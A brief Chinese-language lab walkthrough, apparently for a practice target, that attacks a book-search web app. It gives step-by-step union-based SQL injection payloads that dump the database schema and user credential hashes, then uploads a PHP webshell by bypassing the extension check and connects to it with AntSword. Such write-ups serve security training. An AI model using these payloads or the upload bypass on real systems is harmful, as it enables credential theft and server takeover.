步骤一:信息收集
搜索靶场环境
步骤二:访问搜索地址
步骤三:注册账号密码
username:123
password:123456
登录
点击search
步骤四:输入书名进行burp抓包
步骤五:在书名后进行sql漏洞注入
闭合方式' --+
字段数为3
' order by 3 --+
查询数据库
' union select 1,database(),3 --+
webapphacking
查询表
'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='webapphacking' --+
books,users
查询user表字段
' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='webapphacking' and table_name='users' --+
id,user,pasword,name,address
查询user,pasword信息
' union select 1,2,group_concat(user,pasword) from users --+
利用md5进行解密
利用superadmin进行登录
2386acb2cf356944177746fc92523983
Uncrackable
登录进入页面
步骤六:编写1.php木马文件
步骤七:更改后缀名为.jpg进行文件上传,进型burp抓包
更改文件名后缀为.php进行放包
访问/upload/1.php后进行蚁剑连接